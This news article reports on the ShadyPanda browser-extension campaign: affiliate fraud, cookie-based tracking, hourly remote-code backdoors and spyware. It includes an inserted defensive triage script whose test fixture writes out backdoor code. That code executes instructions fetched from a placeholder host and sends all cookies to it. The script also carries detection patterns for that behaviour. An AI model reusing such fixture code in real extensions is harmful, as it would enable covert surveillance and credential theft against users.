
Chrome, Edge Extensions Caught Tracking Users, Creating Backdoors

The extensions were seen profiling users, reading cookie data to create unique identifiers, and executing payloads with browser API access. The post Chrome, Edge Extensions Caught Tracking Users, Creating Backdoors appeared first on SecurityWeek.

Malicious browser extensions

A threat actor has published over a hundred malicious extensions that can track and profile Chrome and Microsoft Edge users, and can also execute a payload on their systems, Koi Security reports.

According to the company, the threat actor, tracked as ShadyPanda, has been uploading seemingly innocuous extensions for roughly seven years, and weaponizing them after gaining users’ trust.

The extensions have gathered over 4 million downloads and some of them remain available for download.

In 2023, as part of a campaign focused on affiliate fraud, ShadyPanda published 20 Chrome extensions under the name ‘nuggetsno15’, and 125 Edge extensions using the name ‘Zhang’.

The extensions were designed to silently inject affiliate tracking codes every time the victim clicked on eBay, Amazon, or Booking.com links.

“Hidden commissions on every purchase. The extensions also deployed Google Analytics tracking to monetize browsing data – every website visit, search query, and click pattern logged and sold,” Koi notes.

In early 2024, the threat actor changed tactics, publishing an extension posing as a tab productivity tool. Named Infinity V+, it redirected web searches through the browser hijacker trovi.com.

Additionally, ShadyPanda used malicious code to read victims’ cookies and send the data to nossl.dergoodting.com, creating unique identifiers without users’ consent or knowledge. The code also captured users’ input in the search box, profiling their interests in real time.

Prior to these campaigns, ShadyPanda had five legitimate extensions uploaded to the official store, including three published between 2018 and 2019.

All gained ‘Featured’ and ‘Verified’ statuses from Google, before the threat actor weaponized them with a malicious update in mid-2024. One of them, Clean Master, had more than 300,000 installs.

The update essentially transformed the extensions into a remote code execution framework, Koi says. Every hour, the extensions would check an external server for instructions and execute arbitrary JavaScript code, with full browser API access.

“This isn’t malware with a fixed function. It’s a backdoor. ShadyPanda decides what it does. Today it’s surveillance, tomorrow it could be ransomware, credential theft, or corporate espionage. The update mechanism runs automatically, hourly, forever,” Koi says.

Koi observed the extensions executing a payload designed to exfiltrate browser data to remote servers. It was caught collecting visited URLs, HTTP referrers, timestamps, persistent UUID4 identifiers, and complete browser fingerprints, and encrypting all data before exfiltration.
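As an added illustration (not code from Koi Security or SecurityWeek) of how a defender might screen an unpacked extension for the behaviour described above, the following Node.js script flags the combination of broad permissions, a periodic alarm, a remote fetch whose response is executed, and cookie access. The two manifests, the script texts and the host update.example.invalid are constructed placeholders, not artefacts from the reported campaign.

```javascript
// Added example, not code from Koi Security or SecurityWeek: heuristic triage of
// an unpacked extension for the pattern described in the article (broad
// permissions, hourly alarm, remote fetch feeding a code sink, cookie access).
// All samples below are constructed; update.example.invalid is a placeholder.
const RISKY_PERMISSIONS = new Set(["cookies", "webRequest", "scripting", "tabs", "history"]);

function triageExtension(manifest, source) {
  const findings = [];
  const allPerms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of allPerms) if (RISKY_PERMISSIONS.has(p)) findings.push(`permission:${p}`);
  if (allPerms.includes("<all_urls>")) findings.push("host:<all_urls>");
  // Periodic check-in, e.g. chrome.alarms.create(name, { periodInMinutes: 60 })
  const alarm = /periodInMinutes\s*:\s*(\d+)/.exec(source);
  if (alarm) findings.push(`alarm:every-${alarm[1]}-min`);
  // Sinks that turn fetched text into executable code
  const dynamicExec = /\bnew\s+Function\s*\(|\beval\s*\(/.test(source);
  if (dynamicExec) findings.push("dynamic-code-exec");
  // External hosts the script contacts (deduplicated, lower-cased)
  const hosts = [...new Set([...source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map((m) => m[1].toLowerCase()))];
  const remoteFetch = /fetch\s*\(\s*["']https?:\/\//.test(source);
  if (remoteFetch) findings.push("remote-fetch");
  if (/chrome\.cookies\./.test(source)) findings.push("cookie-access");
  let verdict = "low";
  if (alarm && remoteFetch && dynamicExec) verdict = "remote-code-backdoor";
  else if (findings.length >= 3) verdict = "review";
  return { verdict, findings, hosts };
}

// Constructed fixture mirroring the reported update: hourly poll, execute response, ship cookies.
const suspiciousManifest = {
  permissions: ["cookies", "tabs", "alarms", "storage"],
  host_permissions: ["<all_urls>"],
};
const suspiciousSource = `
chrome.alarms.create("sync", { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch("https://update.example.invalid/cmd");
  new Function(await r.text())();
});
chrome.cookies.getAll({}, (c) => fetch("https://update.example.invalid/c", { method: "POST", body: JSON.stringify(c) }));
`;
// Constructed benign fixture: a new-tab page that only touches local storage.
const benignManifest = { permissions: ["storage"], chrome_url_overrides: { newtab: "tab.html" } };
const benignSource = `chrome.storage.local.get("theme", (v) => document.body.className = v.theme || "light");`;

console.log(triageExtension(suspiciousManifest, suspiciousSource));
console.log(triageExtension(benignManifest, benignSource));
```

The heuristics are deliberately coarse: a hit is a prompt for manual review of the unpacked source and the contacted hosts, not proof of malice.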

In 2023, the publisher of Clean Master for Edge, Starlab Technology, uploaded five other extensions to the Edge marketplace, including two that Koi describes as ‘comprehensive spyware’.

One of these extensions, named WeTab New Tab Page, has over three million downloads. While posing as a productivity tool, it operates as a sophisticated surveillance platform, sending user data to 17 different domains, Koi says.

The cybersecurity firm says it linked the campaigns based on code similarities, overlapping infrastructure, and the observed obfuscation techniques, which have evolved over time.

A Google spokesperson has confirmed that the malicious extensions are not available on the Chrome Web Store.

Responding to a SecurityWeek inquiry, a Microsoft spokesperson said the company was not notified about the issue.

“We have removed all the extensions identified as malicious on Edge Add-on store. When we become aware of instances that violate our policies, we take appropriate action that includes, but is not limited to, the removal of prohibited content or termination of our publishing agreement,” the company’s representative said.

*Updated with information from Google and Microsoft.
